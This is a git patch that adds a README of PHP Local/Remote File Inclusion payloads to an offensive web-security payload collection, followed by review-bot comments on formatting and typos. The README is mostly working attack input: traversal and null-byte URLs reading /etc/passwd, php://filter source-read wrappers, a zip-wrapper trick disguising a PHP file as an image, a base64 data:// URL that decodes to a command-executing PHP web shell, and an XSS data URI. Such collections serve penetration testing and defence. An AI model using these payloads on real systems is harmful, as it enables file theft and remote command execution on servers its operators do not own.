From 8317ae4a607463a93e5b942e5af6ca477214f357 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Thu, 20 Oct 2016 09:39:06 +0700 Subject: [PATCH] PHP Include payloads --- PHP_Include/README.md | 40 ++++++++++++++++++++++++++++++++++++++++ README.md | 5 +++-- 2 files changed, 43 insertions(+), 2 deletions(-) create mode 100644 PHP_Include/README.md diff --git a/PHP_Include/README.md b/PHP_Include/README.md new file mode 100644 index 0000000..2e95014 --- /dev/null +++ b/PHP_Include/README.md @@ -0,0 +1,40 @@ +# Local/Remote File Inclusion +The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. + +## Exploit + +Basic LFI (null byte and double encoding) +``` +http://example.com/index.php?page=etc/passwd +http://example.com/index.php?page=etc/passwd%00 +http://example.com/index.php?page=../../etc/passwd +http://example.com/index.php?page=%252e%252e%252f +``` + +LFI Wrapper rot13 and base64 +``` +php://filter/read=string.rot13/resource= +php://filter/convert.base64-encode/resource= +``` + +LFI Wrapper zip +```python +os.system("echo \"\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php") + +zip://shell.jpg%23payload.php +``` + + +RFI Wrapper with "" payload +``` +http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= +``` + + +XSS via RFI/LFI with "" payload +``` +data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ +``` + +## Thanks to +* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion \ No newline at end of file diff --git a/README.md b/README.md index 12ebef6..64eab98 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,7 @@ -# Payloads All The Things +a# Payloads All The Things A list of usefull payloads and bypasses for Web Application Security TODO: -* PHP Include * PHP Serialization * CSV Injection 
@@ -15,8 +14,10 @@ To improve: * Tar command exec * Traversal Directory * XSS +* PHP Include TODO v2: * Remove "_" in dir name +* Add CVE : Hearbleed and ShellShock ? # /!\ Work in Progress : 40%
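Review bot: In the PHP_Include/README.md hunk, the zip example is fenced as a `python` block but mixes an `os.system(...)` call with no `import os` and a bare `zip://shell.jpg%23payload.php` line that is not Python at all; use the plain fence the other blocks use, or split it into the shell command and the resulting wrapper URL. The headings `RFI Wrapper with "" payload` and `XSS via RFI/LFI with "" payload` carry an empty quoted string where the payload text was evidently meant to appear; raw PHP tags in Markdown are treated as HTML and disappear on render, so put that text in inline backticks. The label "Basic LFI (null byte and double encoding)" also does not match its first and third lines, which are a plain path and a `../` traversal, and the `%252e%252e%252f` line is only a double-encoded `../` prefix with no target appended. It would help readers to state the preconditions each entry relies on: `%00` truncation only affects PHP releases before 5.3.4, and the `data://` wrapper only reaches `include` when `allow_url_include` is enabled, which is precisely the setting defenders should confirm is off. Finally, the new file lacks its trailing newline (`\ No newline at end of file`).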
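Review bot: In the first README.md hunk, the replaced title line now reads `a# Payloads All The Things`; the stray leading `a` turns the H1 into plain text and looks like an accidental keystroke, so it should be restored to `# Payloads All The Things`. While this block is being touched, `usefull` in the description line should read `useful`.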
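Review bot: In the second README.md hunk, `+* Add CVE : Hearbleed and ShellShock ?` misspells Heartbleed, and the trailing `?` leaves it unclear whether this is a planned item or an open question; spell it `Heartbleed`, drop the space before the colon, and either commit to the item or track it as a discussion point. Moving `* PHP Include` from TODO to "To improve" is consistent with the new PHP_Include/README.md, but the unchanged `# /!\ Work in Progress : 40%` marker was not revisited for it.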